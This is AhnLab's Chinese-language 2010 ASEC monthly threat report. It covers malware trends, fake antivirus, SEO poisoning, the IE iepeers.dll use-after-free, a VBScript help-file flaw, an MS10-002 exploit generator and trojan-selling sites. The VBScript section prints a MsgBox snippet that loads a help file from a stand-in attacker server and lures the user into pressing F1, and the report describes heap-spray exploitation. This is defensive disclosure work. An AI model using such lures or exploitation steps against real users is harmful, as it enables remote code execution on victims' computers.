2010 ASEC Report Vol.03 安博士公司的安全响应中心(ASEC, AhnLab Security

Emergency Response Center)是以病毒分析师及安全专家组

成的全球性安全响应组织。此报告书是由安博士公司的

ASEC制作,且包含每月发生的主要安全威胁与响应这些威

胁的最新安全技术的简要信息。

详细内容可以在[www.ahn.com.cn]里确认。

ASEC

2010-04-05

2

I. 每月安全疫情 1. 病毒疫情 ............................................................................................... 错误！未定义书签。

2. 安全疫情 ............................................................................................... 错误！未定义书签。

II. 中国第一季度病毒疫情

1. MS10-002 漏洞脚本生成器 ................................................................................................ 12

2. 以金钱为目的出售木马 ....................................................................... 错误！未定义书签。

3

I. 每月安全疫情

1. 病毒疫情

Daonol和Palevo病毒在这3月份仍然猖狂。在国外还有消息称运营Palevo(Mariposa)相关Botnet的运营

商已被抓获。Botnet与控制它的系统都会以巨额价钱卖出，估计这些运营商也是购买这些系统的。

所以近期内Palevo病毒仍然会猖狂。还有安装虚假杀毒软件的程序也仍然猖獗。这次的木马通过发

送伪装成网上订购机票的邮件并诱导用户点击附件。这个月还发现修改Windows环境设置的虚假杀

毒软件，还有通过修改搜索结果来传播病毒的SEO Poisoning Attack。

修改hosts文件

病毒修改hosts文件不是最近才开始的技巧。大部分病毒使用Blackhole路由技巧来拦截访问杀毒软件

及安全相关网站。这次发现的修改hosts文件的病毒是为了回绕特征码扫描而制作。

[图 1-1] 篡改的 hosts 文件格式

如[图 1-1]所示， hosts文件开始是用0x0A来填充(文本编辑器会显示null)。每次生成时大小，垃圾代

码等都是随机， 使用特征码1:1诊断将会失效。修改hosts文件的病毒会把自己隐藏在用户模式下，

并执行IRCBot工作。 而且还会把自己的重要代码注入到Explorer.exe等系统重要进程后在其中执行

。

感染系统驱动文件的病毒

3月份发现感染cdrom.sys驱动文件的病毒。目前为止成为病毒感染主要对象的系统驱动文件如下：

4

这些是通过很多途径来被感染的，最近还发现通过虚假杀毒软件也会感染。去年开始上报的此类型

病毒的感染技巧，乃今为止几乎没有太大变化。被感染的文件的外形如下：

[图 1-2] 感染后驱动文件的结构和运行后例子

正常驱动文件加密并保存在最后节中。病毒加载时解密该部分并正常执行正常驱动文件。这时正常

驱动文件与发送垃圾邮件的其他模块同时会执行。这些恶意代码不是存储在文件中，而是通过注入

到Services.exe来执行。病毒修改系统驱动文件(或打补丁)的目的是防止诊断/治疗，而且还为了回绕

杀毒软件的主动防御。而且估计还想反利用云技术的优点。所以了解这些情况，选择拥有可响应此

类技术的杀毒软件也成为了消费者的重要选择。

USB充电程序中包含的病毒

制作电池和充电器而闻名的厂商的显示USB充电状态的程序中发现恶意代码。至今还未发现恶意代

码是如何嵌入其中的，但是感染该病毒后打开7777/TCP端口，并从外部可执行文件搜索及执行等后

门指令。该恶意代码在V3中诊断为Win-Trojan/Arurizer. 28672。

利用PDF漏洞的恶意文档的传播

Ntfs.sys

Ndis.sys

Agp440.sys

Cdrom.sys

5

最近发现利用PDF文件所包含的，解析TIF文件时发生的漏洞(CVE-2010-0188)的大量恶意PDF文档。

针对该漏洞的安全补丁早在2月16日已发布，但是此类恶意文档仍然大量被传播。这说明很多用户仍

然使用包含漏洞的版本，而且对PDF安全问题不太了解。

IE浏览器0-day漏洞报告

3月份发现IE浏览器0-day漏洞。这是利用了MS浏览器中'iepeers.dll'的代码执行漏洞。漏洞被暴露后，

针对该漏洞的恶意脚本大量传播。这意味着漏洞仍然是病毒最常使用的传播手段，而且针对用户来

说意味着持续打安全补丁,升级杀毒软件病毒库的重要性。

修改Windows环境设置的虚假杀毒软件

3月份发现修改Windows环境设置的虚假杀毒软件。普通虚假杀毒软件为了自启动，添加到Windows

的Run注册表自启动项。但是最近发现的虚假杀毒软件修改注册表来实现每次运行EXE文件时自动运

行自己。所以在Windows系统中每当运行可执行文件时会自动运行虚假杀毒软件。此时如果只删除

虚假杀毒软件，会导致系统上的所有正常可执行文件也将无法正常运行的严重问题。如果在Window

s系统中运行程序时即没有错误提示而且无法运行，以下注册表值被修改的可能性很大。

此时使用以下方法来临时解决问题。

[开始] -> [运行] -> (O): 输入 “command” 后点击[确认]。

输入“CD\Windows”后回车，(其中Windows是值Windows的安装文件夹)

输入“ren regedit.exe regedit.com”后回车，

输入“regedit”后回车来打开注册表编辑器。

在注册表编辑器中展开“HKEY_CLASSES_ROOT\. exe”。

如果“(默认值)”的数据不是“exefile”时修改为“exefile”并结束注册表编辑器。

上述方法是无法正常运行后缀为exe时把exe执行文件修改为com可执行文件来运行，然后重新还原ex

e后缀名可命令。所以只能在无法正常运行可执行文件时才可使用。

SEO Poisoning Attack

随着互联网搜索引擎网站的发展，大部分的人可以通过搜索网站获取自己想要的信息。在这种背景

下最近频繁发现修改搜索结果的排列，把病毒传播网站放到最前面，使用户访问这些网站的病毒，

而且预测此类病毒以后也将继续增加。一般用户输入搜索关键词后在搜索结果中只看前2～3页左右，

所以只要知道搜索引擎的SEO（Search Engine Optimization(搜索引擎优化)），就可以把自己想要的

网站放到最前面。以前病毒制作者是把恶意代码嵌入到包含漏洞的网页或通过正规网站的BBS来进

6

行传播，但是最近转换为利用SEO算法把恶意网站暴露到搜索结果的前面来使用户点击恶意网站的

方式。这些技巧是利用通过搜索引擎搜索来想了解社会上所发生的重要新闻的人们心理的社会工程

学 攻 击 技 术 。 下面举个例子来简单说明吧。下面图片是关于不久前发生的海底地震 ， 用 "Haiti

earthquake donate"搜索时显示的结果中暴露的病毒传播网站。

[图 1-3] 链接病毒传播网站的过程

1) 用户用搜索关键词“Haiti earthquake donate”在搜索网站中进行搜索。 2) 通过搜索引擎搜索的结果会显示到搜索结果页面。 3) 其中病毒传播网站也会显示在前面，用户点击后会访问恶意网站。 4) 然后欺骗用户下载并运行病毒。 5) 大部分所传播的病毒是虚假杀毒软件。

这些传播方式是几年前开始就有的，不算是最新攻击方式。但是因为主要社会事件搜索结果中，

比如 “马克杰克逊”，“冬季奥运会”都有可能包含恶意网站，需要用户的注意。这个月发现的

连接恶意网站的搜索结果的搜索关键词如下：

Taiwan Earthquake

7

奥斯卡金像奖

好莱坞明星 Corey Haim 葬礼 & Pacquiao vs Clottey

Andre Pitre Kim Yuna Youtube

使用 SiteGuard 等网页浏览器安全产品来可有效预防 SEO Poisoning Attack。

8

2. 安全疫情

Microsoft Internet Explorer "iepeers.dll" Use-after-free Vulnerability

引发该漏洞的元凶是Internet Explorer的Folders和printing里使用的iepeers.dll文件。当操作iepeers.

dll内部的设置属性函数setAttribute()时将会产生异常问题。该漏洞里使用的DHTML的userDate Beh

avior拥有比cookie更大的存储空间，而且和cookie一样当存储客户端数据时被使用。

按照语言划分的userData Behavior的规则如下。

[XML]

<Prefix: CustomTag ID=sID STYLE="behavior:url('#default#userData')" />

[HTML]

<ELEMENT STYLE="behavior:url('#default#userData')" ID=sID>

[Scripting]

object.style.behavior = "url('#default#userData')"

object.addBehavior ("#default#userData")

[CSS]

h3 { behavior: url(#default#userData); }

要想操作userData Behavior必须使用setAttribute()或getAttribute()函数，而且在这个过程当中将会引

发问题。出现漏洞的原因是预想使用已经释放的对象。该漏洞只会在Internet Explorer6,7版本上产

生，在Internet Explorer 5, 8版本中不会产生。

iepeers.dll [setAttribute@CPersistUserData]

//改变VARAINT类型

.text:4223539F push 409h ; lcid

.text:422353A4 mov eax, esi

.text:422353A6 push eax ; pvarSrc

.text:422353A7 push eax ; pvargDest

.text:422353A8 call ds:__imp__VariantChangeTypeEx@

.text:422353AE mov edi, eax

.text:422353B0 test edi, edi

.text:422353B2 jnz short loc_42235415

...

// 清除变量...

.text:42235415 lea eax, [ebp+pvarg]

9

.text:42235418 push eax ; pvarg

.text:42235419 call ds:__imp__VariantClear@4 ; VariantClear(x)

把产生问题的代码转换成C语言

v3 = VariantChangeTypeEx(&data, &data, 0x409u, 0, 8u);

if ( v3 ) {

VariantClear(&pvarg);

return value;

}

jscript.dll [IDispatchExGetDispID]

.text:75BC3055 push [ebp+arg_10]

.text:75BC3058 mov eax, [ebp+arg_4]

.text:75BC305B push [ebp+arg_C]

.text:75BC305E mov ecx, [eax] ; 使用已经释放的对象

.text:75BC3060 push [ebp+arg_8]

.text:75BC3063 push eax

.text:75BC3064 call dword ptr [ecx+1Ch] ; 访问内存错误

攻击代码如下：

[图 1-4] 被病毒使用的漏洞

如上所述，当访问已经释放的对象的指针时将产生内存访问错误。攻击者就是利用该漏洞往堆领

域放入攻击性的Shellcode，当访问错误后接着访问堆时可控制被害者电脑。

10

VBScript 代码执行漏洞

Microsoft公司的VBScript里发现了HLP文件相关的代码执行漏洞。该漏洞包含以下两种元素。

执行命令 : VBScript “MsgBox” + F1 + 执行远程地区 .hlp 文件。

栈溢出 : 执行winhlp32.exe时输入很长的参数将回产生栈溢出。

产生第一个漏洞的VBScript中MsgBox函数拥有给用户弹出消息的功能。.

- MsgBox 函数–

MsgBox(prompt[,buttons][,title][,helpfile,context])

通过VBScript的MsgBox里的参数可访问Windows Help文件。攻击者编写的MsgBox将会访问恶性的

help文件并且诱导用户按键盘里的”F1”按钮。

Big = “\\攻击者服务器\攻击者文件.hlp”

MsgBox “please press F1 to save the world”, ,”please save the world”, big, 1

MsgBox “press F1 to close this annoying popup”, ,””, big, 1

MsgBox “press F1 to close this annoying popup”, ,””, big, 1

当用户按”F1”键时，通过winhlp32.exe文件执行攻击者制作的文件并执行特定的命令。

该漏洞的要求是用户必须按”F1”键，并且为了接触SMB Session要求139/445等通信渠道。因限制性

的条件，危险度可判定为“中”。

.第二个漏洞是栈溢出漏洞。该溢出漏洞是在winhlp32.exe的Finitialize函数内部产生。

[图 1-5] winhlp32.exe.的 Finitialize函数

11

[图 1-6] 调式winhlp32.exe.的 Finitialize函数

该函数内部的栈的实际大小是0x34C = 844(sub esp, 34Ch)字节。但是从本地接收的数据从EBP开

始既664字节的地方开始复制，因此可以说字符串的最大有效大小是664字节。当输入的大小超过6

64字节时将会覆盖RET地址。

攻击者利用Heap spray技术往堆里放入Shellcode后，使返回值指向shellcode所在的堆并获取电脑的权限。

[图 1-7] buffer的前后对照

12

II. 中国第一季度病毒疫情

1. MS10-002 漏洞脚本生成器

2010年1月22日ASEC报告了微软的未知IE漏洞并进行了详细分析。由于利用该漏洞的攻击方式被

广泛传播，微软公司紧急提供了可预防该漏洞的MS10-002补丁，并最限度的减少了用户损失。AS

EC针对该漏洞收集信息及分析的过程中在某些网站上发现了利用MS10-002漏洞制作的恶性脚本生

成器。

13

[图 2-1] – 在中国发现的利用MS10-002 漏洞制作的恶性脚本生成器

只要在MS10-002漏洞恶性脚本生成器的文本框中输入想要插入恶性脚本的网站，就会生成类似如

下的利用漏洞的恶性脚本。

[图 2-2] – MS10-002 生成器生成的恶性脚本

这次发现的恶性脚本生成器里生成的脚本与之前发现的相比，Buffer 地址从0x0c0d0c0d改变成

0x0a0a0a0a。

[图片2-3] –改变的Buffer地址

14

制作的Shellcode只有下载特定木马的功能，并且以函数为单位制作的更加精巧。其包含了是否使

用IE加载的模块及为了躲避查杀使代码难以看懂的特征。

[图 2-4] – 通往Shellcode的部分

像这种利用漏洞生成恶性脚本的生成器与2007年7月份某些黑客制作的利用MPEG2TuneRequest漏

洞的案例类似，在一些不良网站里预计更多。因此，希望使用微软浏览器的用户要及时安装微软

提供的紧急MS10-002补丁尽可能地减少损失。

2. 以金钱为目的出售木马

以金钱为目的的黑客攻击成为严重问题，ASEC在调查一些不良网站的过程中发现了出售以金钱为

目的的黑客工具和DDS攻击工具的网站。

15

[图 2-5] – 为了获取金钱为目的的中国的出售木马网站

这次发现的不良网站上(如上图片)出售着木马及DDos攻击工具，同时为了韩国的购买用户提供了

韩文的网站并详细介绍了木马及DDos攻击工具的使用说明。该网站上出售的木马的价格是1万韩元

至10万韩元，DDos攻击工具的价格是数十万韩元。像这种为了获取金钱为目的出售木马及攻击工

具的方式将会给安全领域带来新的威胁并越加严重。